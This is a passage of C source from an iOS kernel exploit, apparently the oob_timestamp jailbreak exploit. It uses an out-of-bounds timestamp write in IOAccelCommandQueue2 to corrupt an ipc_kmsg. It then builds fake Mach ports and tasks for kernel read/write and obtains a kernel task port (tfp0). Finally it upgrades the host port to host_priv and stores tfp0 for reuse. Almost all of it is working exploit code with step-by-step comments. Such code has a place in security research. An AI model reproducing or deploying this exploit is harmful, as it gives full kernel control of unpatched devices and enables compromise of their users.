        return 0;
    };
    // We also define a function that checks if an upper bound on the timestamp suggests that
    // the overflow_size used was okay.
    bool (^check_overflow_size_for_timestamp)(uint64_t, size_t) = ^bool(uint64_t ts, size_t overflow_size) {
        assert(3 <= overflow_size && overflow_size <= 8);
        // If overflow_size is 3, then drop the lower 5 bytes from the timestamp.
        uint32_t ipc_kmsg_size = (uint32_t) (ts >> (8 * (8 - overflow_size)));
        assert(0x0003ffa9 <= ipc_kmsg_size);    // This should always be true.
        return (0x0003ffa9 <= ipc_kmsg_size && ipc_kmsg_size <= 0x0400a8ff);
    };
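
    // Worked example (illustrative values only): if mach_absolute_time() returns
    // 0x0000000287654321, that falls in the overflow_size = 7 range, so the seven high-order
    // bytes of the little-endian timestamp land past the end of the command buffer. The four
    // of them that overlay ikm_size yield (uint32_t) (0x0000000287654321 >> 8) = 0x02876543,
    // inside the target window [0x0003ffa9, 0x0400a8ff]. Because the clock keeps ticking
    // between the userspace reading and the kernel's write, check_overflow_size_for_timestamp()
    // re-validates with a second reading after the submission.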

    // 20. Trigger the OOB write to corrupt the size of the ipc_kmsg directly after the command
    // buffer. We bump ikm_size from 0x0001ffa8 to between 0x0003ffa9 and 0x0400a8ff, which
    // means that when the ipc_kmsg is freed, at least 16 pages will be deallocated (taking out
    // both the original ipc_kmsg allocation and the OOL ports array directly following).
    //
    // -+------------------+-----------+-----------+-----------------+-----------------+-------
    //  |  command buffer XX ipc_kmsg  | ool ports |   kfree buf 1   |   kfree buf 2   |  ...
    // -+------------------+-----------+-----------+-----------------+-----------------+-------
    //                     |-ikm_size--------------------------------------->|
    size_t overflow_size = 0;
retry_overflow:
    overflow_size = compute_overflow_size_for_timestamp(mach_absolute_time());
    if (overflow_size == 0) {
        sleep(1);
        goto retry_overflow;
    }
    init_out_of_bounds_timestamp_write_size(overflow_size);
    IOAccelCommandQueue2_submit_command_buffers(IOAccelCommandQueue2,
            &submit_args.header, sizeof(submit_args));
    ok = check_overflow_size_for_timestamp(mach_absolute_time(), overflow_size);
    if (!ok) {
        INFO("Retrying corruption...");
        goto retry_overflow;
    }
    INFO("Corrupted ipc_kmsg ikm_size");

    // 21. Destroy the port containing the corrupted ipc_kmsg to free the OOL ports array.
    //
    //                    [ ipc_kmsg ] [ool ports] [  kfree buf 1  ] [ kfree ]
    // -+------------------v-----------v-----------v-----------------v-------+---------+-------
    //  |  command buffer  |                                                 |  buf 2  |  ...
    // -+------------------+-------------------------------------------------+---------+-------
    //                     |-ikm_size--------------------------------------->|
    mach_port_destroy(mach_task_self(), corrupted_kmsg_port);
    INFO("Freed the OOL ports");

    // 22. Reallocate the out-of-line ports with controlled data. This needs to be done using
    // kmem_alloc() to avoid tripping KMA_ATOMIC, since receiving the out-of-line ports will
    // cause them to be freed with kfree().
    //
    //                    [ ipc_kmsg ] [ool ports] [  kfree buf 1  ] [ kfree ]
    // -+------------------v-----------v-----------v-----------------v-----+-+---------+-------
    //  |  command buffer  |    fake ool ports     |    fake ool ports     | |  buf 2  |  ...
    // -+------------------+-----------------------+-----------------------+-+---------+-------
    //                     |-ikm_size--------------------------------------->|
    uint32_t ool_ports_reallocation_key = IOSurface_property_key(iosurface_property++);
    ok = IOSurface_kmem_alloc_array_fast(ool_ports_reallocation_key,
            ool_ports_reallocation_array_buffer,        // The pre-initialized buffer
            ool_ports_reallocation_array_buffer_size);  // The size
    if (!ok) {
        ERROR("Could not reallocate OOL ports");
        fail();
    }
    INFO("Reallocated OOL ports");

    // 23. Reallocating the OOL ports was our last act of kernel heap manipulation, so go ahead
    // and destroy all the holding ports. This won't destroy the ool_ports_msg_holding_port.
    holding_ports_destroy(all_holding_ports);

    // 24. Fault all the pages of the command buffer. If we don't do this, then trying to
    // access the command buffer will panic, because the first access is trying to take a lock
    // with preemption disabled, which means vm_fault() will bail. Wiring the memory above does
    // not ensure that accessing the pages from the kernel won't panic.
    void (^init_fake_port)(void *) = ^(void *page) {
        uint8_t *page_data = page;
        *(uint16_t *) (page_data + 0x16) = 42;
        uint8_t *port = page_data + fake_port_offset;
        FIELD(port, ipc_port, ip_bits, uint32_t) = io_makebits(1, IOT_PORT, IKOT_NONE);
    };
    for_each_page(command_buffer, command_buffer_size,
            ^(void *page, size_t index, bool *stop) {
        // Place a CollectTimeStamp command at the start of the page. It will collect the
        // timestamp and then skip to the next page, or to the end of this page if this is
        // the last page.
        struct IOAccelKernelCommand_CollectTimeStamp *ts_cmd = page;
        bool end = (index == (command_buffer_size / page_size) - 1);
        ts_cmd->command.type = 2;
        ts_cmd->command.size = (uint32_t) page_size - (end ? sizeof(*ts_cmd) : 0);
        // Place a fake Mach port on every page.
        init_fake_port(page);
    });
    for_each_page(segment_list, segment_list_size,
            ^(void *page, size_t index, bool *stop) {
        // Place a fake Mach port on every page but the first (since that would corrupt the
        // segment list header).
        if (index > 0) {
            init_fake_port(page);
        }
    });
    IOAccelCommandQueue2_submit_command_buffers(IOAccelCommandQueue2,
            &submit_args.header, sizeof(submit_args));

    // 25. Receive the out-of-line ports. This gives us a receive right to the fake port inside
    // the command buffer (or possibly the segment list).
    //
    // Receiving the fake out-of-line ports also truncates one of the kmem_alloc() buffers we
    // sprayed.
    //
    //                    [ ipc_kmsg ] [ool ports] [  kfree buf 1  ] [ kfree ]
    //                    [e ool ports]
    // -+------------------v-----------v-----------v-----------------v-----+-+---------+-------
    //  |  command buffer  | fak|      |    fake ool ports     |           | |  buf 2  |  ...
    // -+------------------+-----------------------+-----------------------+-+---------+-------
    //                     |-ikm_size--------------------------------------->|
    __block mach_port_t fake_port = MACH_PORT_NULL;
    ool_ports_receive(&ool_ports_msg_holding_port, 1,
            ^(mach_port_t *ool_ports, size_t count) {
        // We expect the first port to be the fake port. Save it and remove it from the
        // array so that it doesn't get destroyed.
        fake_port = ool_ports[0];
        ool_ports[0] = MACH_PORT_NULL;
    });
    if (!MACH_PORT_VALID(fake_port)) {
        ERROR("Did not receive fake_port");
        fail();
    }
    INFO("Received fake port 0x%x", fake_port);

    // 26. Give ourselves a send right to the port.
    mach_port_insert_send_right(fake_port);

    // 27. Identify the fake port inside the buffer by looking for a page with a fake port that
    // now has an initialized ip_receiver field. The value of this field is the current task's
    // ipc_space.
    __block uint8_t *fake_port_data = NULL;
    __block uint64_t current_ipc_space = 0;
    // Check both buffers, just in case.
    void *buffer_candidates[2] = { command_buffer, segment_list };
    size_t buffer_candidate_sizes[2] = { command_buffer_size, segment_list_size };
    const char *buffer_candidate_names[2] = { "command buffer", "segment list" };
    for (unsigned i = 0; current_ipc_space == 0 && i < 2; i++) {
        void *buffer = buffer_candidates[i];
        size_t buffer_size = buffer_candidate_sizes[i];
        const char *buffer_name = buffer_candidate_names[i];
        // Check each page to see if it contains the port.
        for_each_page(buffer, buffer_size, ^(void *page, size_t index, bool *stop) {
            uint8_t *port = (uint8_t *) page + fake_port_offset;
            uint64_t ip_receiver = FIELD(port, ipc_port, ip_receiver, uint64_t);
            if (ip_receiver != 0) {
                // Found the port!
                fake_port_data = port;
                current_ipc_space = ip_receiver;
                *stop = true;
                INFO("Found fake port in %s at offset 0x%08zx",
                        buffer_name, port - (uint8_t *) buffer);
            }
        });
    }
    if (fake_port_data == NULL) {
        ERROR("Could not find fake port in shared memory regions");
        fail();
    }
    INFO("ipc_space: 0x%016llx", current_ipc_space);

    // 28. Construct a kernel memory read primitive using the fake port.
    uint64_t fake_task_address = fake_port_address + page_size;
    uint8_t *fake_task_data = fake_port_data + page_size;
    uint8_t *fake_task_page = fake_task_data - (fake_task_address & (page_size - 1));
    *(uint16_t *) (fake_task_page + 0x16) = 58;

    INFO("fake_task_address 0x%016llx", fake_task_address);

    // Read a 32-bit value using pid_for_task(). Pointing the fake task's bsd_info at
    // (address - OFFSET(proc, p_pid)) makes pid_for_task() return the 4 bytes at address
    // as the "pid".
    uint32_t (^stage0_read32)(uint64_t) = ^uint32_t(uint64_t address) {
        uint64_t fake_proc_address = address - OFFSET(proc, p_pid);
        FIELD(fake_task_data, task, ref_count, uint32_t) = 2;
        FIELD(fake_task_data, task, bsd_info, uint64_t) = fake_proc_address;
        FIELD(fake_port_data, ipc_port, ip_bits, uint32_t) = io_makebits(1, IOT_PORT, IKOT_TASK);
        FIELD(fake_port_data, ipc_port, ip_kobject, uint64_t) = fake_task_address;
        int32_t pid = -1;
        kern_return_t kr = pid_for_task(fake_port, &pid);
        if (kr != KERN_SUCCESS) {
            ERROR("Failed to read address 0x%016llx", address);
            fail();
        }
        return pid;
    };
    // Read a 64-bit value using stage0_read32().
    uint64_t (^stage0_read64)(uint64_t) = ^uint64_t(uint64_t address) {
        union {
            uint32_t value32[2];
            uint64_t value64;
        } u;
        u.value32[0] = stage0_read32(address);
        u.value32[1] = stage0_read32(address + 4);
        return u.value64;
    };

    // 29. Grab our task pointer.
    uint64_t current_task = stage0_read64(current_ipc_space + OFFSET(ipc_space, is_task));

    // 30. Walk the proc list until we find the kernproc.
    uint64_t current_proc = stage0_read64(current_task + OFFSET(task, bsd_info));
    uint64_t kernproc = 0;
    for (uint64_t proc = current_proc;;) {
        if (proc == 0) {
            break;
        }
        int pid = stage0_read32(proc + OFFSET(proc, p_pid));
        if (pid == 0) {
            kernproc = proc;
            break;
        }
        proc = stage0_read64(proc + OFFSET(proc, p_list_next));
    }

    // 31. Grab the kernel_task, kernel_map, and ipc_space_kernel.
    uint64_t kernel_task = stage0_read64(kernproc + OFFSET(proc, task));
    uint64_t kernel_map = stage0_read64(kernel_task + OFFSET(task, map));
    uint64_t current_task_port = stage0_read64(current_task + OFFSET(task, itk_sself));
    uint64_t ipc_space_kernel = stage0_read64(current_task_port + OFFSET(ipc_port, ip_receiver));

    // 32. Convert our fake port into a fake kernel_task.
    void (^build_fake_kernel_task)(void *) = ^(void *fake_task) {
        FIELD(fake_task, task, lck_mtx_data, uint64_t) = 0;
        FIELD(fake_task, task, lck_mtx_type, uint8_t) = 0x22;
        FIELD(fake_task, task, ref_count, uint32_t) = 4;
        FIELD(fake_task, task, active, uint32_t) = 1;
        FIELD(fake_task, task, map, uint64_t) = kernel_map;
    };
    void (^build_fake_kernel_port)(void *, uint64_t) = ^(void *fake_port, uint64_t fake_task_address) {
        FIELD(fake_port, ipc_port, ip_bits, uint32_t) = io_makebits(1, IOT_PORT, IKOT_TASK);
        FIELD(fake_port, ipc_port, ip_references, uint32_t) = 4;
        FIELD(fake_port, ipc_port, ip_receiver, uint64_t) = ipc_space_kernel;
        FIELD(fake_port, ipc_port, ip_kobject, uint64_t) = fake_task_address;
        FIELD(fake_port, ipc_port, ip_mscount, uint32_t) = 1;
        FIELD(fake_port, ipc_port, ip_srights, uint32_t) = 1;
    };
    build_fake_kernel_task(fake_task_data);
    build_fake_kernel_port(fake_port_data, fake_task_address);
    // Now we can use our fake_port as a kernel task port.
    kernel_task_port = fake_port;

    // 33. Construct a better kernel task port.
    uint64_t fake_kernel_task_page = kernel_vm_allocate(2 * page_size);
    if (fake_kernel_task_page == 0) {
        ERROR("Could not allocate fake kernel task");
        fail();
    }
    uint64_t fake_kernel_task_port_page = fake_kernel_task_page + page_size;
    uint8_t page_buffer[page_size / 4];
    // Build the fake kernel_task.
    memset(page_buffer, 0, sizeof(page_buffer));
    *(uint16_t *) (page_buffer + 0x16) = 58;
    uint64_t fake_kernel_task_address = fake_kernel_task_page + 0x100;
    uint8_t *fake_kernel_task_data = page_buffer + 0x100;
    build_fake_kernel_task(fake_kernel_task_data);
    ok = kernel_write(fake_kernel_task_page, page_buffer, sizeof(page_buffer));
    if (!ok) {
        ERROR("Failed to initialize fake kernel task page");
        fail();
    }
    // Build the fake kernel_task port.
    memset(page_buffer, 0, sizeof(page_buffer));
    *(uint16_t *) (page_buffer + 0x16) = 42;
    uint64_t fake_kernel_task_port_address = fake_kernel_task_port_page + 0x100;
    uint8_t *fake_kernel_task_port_data = page_buffer + 0x100;
    build_fake_kernel_port(fake_kernel_task_port_data, fake_kernel_task_address);
    ok = kernel_write(fake_kernel_task_port_page, page_buffer, sizeof(page_buffer));
    if (!ok) {
        ERROR("Failed to initialize fake kernel task port page");
        fail();
    }

    // 34. Look up our current fake port and replace it with the new fake kernel_task port.
    uint64_t (^ipc_entry_lookup)(mach_port_t) = ^uint64_t(mach_port_t port_name) {
        uint64_t itk_space = current_ipc_space;
        uint32_t table_size = kernel_read32(itk_space + OFFSET(ipc_space, is_table_size));
        uint32_t port_index = MACH_PORT_INDEX(port_name);
        if (port_index >= table_size) {
            return 0;
        }
        uint64_t is_table = kernel_read64(itk_space + OFFSET(ipc_space, is_table));
        uint64_t entry = is_table + port_index * SIZE(ipc_entry);
        return entry;
    };
    uint64_t fake_port_entry = ipc_entry_lookup(fake_port);
    // Drop our receive right so that we now only have a send right.
    uint32_t ie_bits = kernel_read32(fake_port_entry + OFFSET(ipc_entry, ie_bits));
    ie_bits &= ~MACH_PORT_TYPE_RECEIVE;
    kernel_write32(fake_port_entry + OFFSET(ipc_entry, ie_bits), ie_bits);
    // Change the object to point to the new fake kernel task port. This write has to be
    // atomic with respect to the write primitive itself (i.e. it can't be composed of two
    // separate 32-bit writes).
    kernel_write64(fake_port_entry + OFFSET(ipc_entry, ie_object),
            fake_kernel_task_port_address);

    // 35. Destroy the holding port for the out-of-line Mach ports message.
    mach_port_destroy(mach_task_self(), ool_ports_msg_holding_port);

    // 36. Patch up the IOSurface properties. We freed some of the kfree() buffer allocations
    // (and possibly split one allocation), and some of the OOL ports reallocation spray OSData
    // buffers probably overlap.
    // Get the address of the IOSurface.
    uint64_t IOSurfaceRootUserClient_ipc_entry = ipc_entry_lookup(IOSurfaceRootUserClient);
    uint64_t IOSurfaceRootUserClient_port =
            kernel_read64(IOSurfaceRootUserClient_ipc_entry + OFFSET(ipc_entry, ie_object));
    uint64_t IOSurfaceRootUserClient_address =
            kernel_read64(IOSurfaceRootUserClient_port + OFFSET(ipc_port, ip_kobject));
    uint64_t surfaceClients = kernel_read64(IOSurfaceRootUserClient_address
            + OFFSET(IOSurfaceRootUserClient, surfaceClients));
    uint64_t surfaceClient = kernel_read64(surfaceClients + IOSurface_id * sizeof(uint64_t));
    uint64_t surface = kernel_read64(surfaceClient + OFFSET(IOSurfaceClient, surface));
    // Get the OSDictionary of IOSurface properties and read out the array of entries.
    uint64_t properties = kernel_read64(surface + OFFSET(IOSurface, properties));
    uint32_t property_count = kernel_read32(properties + OFFSET(OSDictionary, count));
    uint64_t property_array = kernel_read64(properties + OFFSET(OSDictionary, dictionary));
    // We will build an array of OSData buffer addresses that have already been validated and
    // that future OSData objects should not overlap.
    uint64_t *validated_buffers = NULL;
    size_t validated_buffers_count = 0;
    size_t validated_buffers_capacity = 0;
    // Loop through each entry in the OSDictionary, patching up all the problematic OSData
    // objects we sprayed.
    for (uint32_t property_idx = 0; property_idx < property_count; property_idx++) {
        // Get the first 4 bytes of the key.
        uint64_t key_symbol = kernel_read64(property_array
                + (2 * property_idx) * sizeof(uint64_t));
        uint64_t key_data = kernel_read64(key_symbol + OFFSET(OSString, string));
        uint32_t key_value = kernel_read32(key_data);
        // Skip any keys that don't correspond to the properties we need to fix up.
        if (key_value != kfree_buffer_key && key_value != ool_ports_reallocation_key) {
            continue;
        }
        // The value of this property should be an OSArray.
        uint64_t osarray = kernel_read64(property_array
                + (2 * property_idx + 1) * sizeof(uint64_t));
        uint32_t element_count = kernel_read32(osarray + OFFSET(OSArray, count));
        uint64_t elements = kernel_read64(osarray + OFFSET(OSArray, array));
        // Grow the validated_buffers array if necessary.
        if (validated_buffers_count + element_count > validated_buffers_capacity) {
            uint64_t new_capacity = validated_buffers_count + element_count;
            uint64_t *new_validated_buffers = realloc(validated_buffers,
                    new_capacity * sizeof(validated_buffers[0]));
            assert(new_validated_buffers != NULL);
            validated_buffers = new_validated_buffers;
            validated_buffers_capacity = new_capacity;
        }
        // Loop through every OSData element in the array.
        for (uint32_t element_idx = 0; element_idx < element_count; element_idx++) {
            // Read out the OSData. The data buffer is valid if (1) it is exactly
            // mapped by a single allocation, and (2) it does not collide with another
            // data buffer. Any OSData that does not abide by these properties will
            // have its size set to zero. This does mean that we will leak the two
            // partial OSData objects (where part of the buffer was freed but the other
            // part is still allocated).
            uint64_t osdata = kernel_read64(elements + element_idx * sizeof(uint64_t));
            uint32_t buffer_size = kernel_read32(osdata + OFFSET(OSData, capacity));
            uint64_t buffer_address = kernel_read64(osdata + OFFSET(OSData, data));
            // If this OSData's buffer has been previously validated, then the
            // allocation is going to be freed by another OSData, so prevent it from
            // being freed again.
            for (size_t i = 0; i < validated_buffers_count; i++) {
                if (buffer_address == validated_buffers[i]) {
                    goto disable_free;
                }
            }
            // Get the start address and size of the allocation that contains the first
            // page of the OSData buffer.
            mach_vm_address_t region_address = buffer_address;
            mach_vm_size_t region_size = 0;
            natural_t depth = 0;
            struct vm_region_submap_info_64 info;
            mach_msg_type_number_t count = VM_REGION_SUBMAP_INFO_COUNT_64;
            kr = mach_vm_region_recurse(kernel_task_port,
                    &region_address, &region_size, &depth,
                    (vm_region_recurse_info_t) &info, &count);
            if (kr != KERN_SUCCESS) {
                WARNING("Could not determine OSData allocation region");
                goto disable_free;
            }
            // If this OSData's buffer does not exactly align with the allocation,
            // prevent it from being freed.
            // TODO: Free this data properly.
            if (region_address != buffer_address || region_size != buffer_size) {
                WARNING("Leaking 0x%016llx-0x%016llx",
                        region_address, region_address + region_size);
                goto disable_free;
            }
            // This OSData buffer is valid. Add it to the list.
            assert(validated_buffers_count < validated_buffers_capacity);
            validated_buffers[validated_buffers_count] = buffer_address;
            validated_buffers_count++;
            continue;
disable_free:
            // Prevent this OSData from freeing its buffer by setting the size to zero.
            kernel_write32(osdata + OFFSET(OSData, capacity), 0);
        }
    }
    // Free the validated buffers array.
    free(validated_buffers);

    // 37. Store the address of some vtable so we can scan for the kernel base. We can no
    // longer scan backwards from realhost because trying to read the PPL pages faults.
    uint64_t kernel_text_address = kernel_read64(IOSurfaceRootUserClient_address);
    kernel_text_address |= 0xffffff8000000000;    // Strip the PAC bits from the vtable pointer.

    // 38. Clean up IOSurface.
    INFO("Deinitializing IOSurface");
    IOSurface_deinit();
    INFO("IOSurface deinitialized");

    // 39. Get the kernel base address.
    kaddr_t kbase, kslide;
    kbase = get_kbase(&kslide, kernel_task_port);
    if (kbase == 0) {
        ERROR("Could not find the kernel base");
        fail();
    }

    INFO("kernel base: 0x%016llx", kbase);
    INFO("kernel slide: 0x%016llx", kslide);

    INFO("tfp0: 0x%x", kernel_task_port);

    // Make task_info(TASK_DYLD_INFO) on the new kernel task port report the kernel base.
    kernel_write64(fake_kernel_task_address + OFFSET(task, all_image_info_addr), kbase);
    // Convert our host port into the privileged host port and stash the fake kernel task port
    // in realhost's special port 4 so that future runs can simply retrieve tfp0 (see the check
    // at the top of this function).
    uint64_t host_entry = ipc_entry_lookup(host);
    uint64_t host_port = kernel_read64(host_entry + OFFSET(ipc_entry, ie_object));
    mach_port_deallocate(mach_task_self(), host);
    kernel_write32(host_port + OFFSET(ipc_port, ip_bits), io_makebits(1, IOT_PORT, IKOT_HOST_PRIV));
    uint64_t realhost = kernel_read64(host_port + OFFSET(ipc_port, ip_kobject));
    kernel_write64(realhost + OFFSET(host, special) + 4 * sizeof(uint64_t),
            fake_kernel_task_port_address);

    //init_with_kbase(kernel_task_port, kbase);
    //rootify(getpid());
    //printf("UID = %u", getuid());
    //term_jelbrek();
}
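
/*
 * A minimal, hypothetical driver for this file (the original project keeps its entry point in
 * a separate translation unit; this sketch only shows the intended call sequence and is
 * disabled by default):
 */
#if 0
int
main(int argc, char **argv) {
    oob_timestamp();
    if (!MACH_PORT_VALID(kernel_task_port)) {
        ERROR("Exploit failed");
        return 1;
    }
    INFO("tfp0: 0x%x", kernel_task_port);
    return 0;
}
#endif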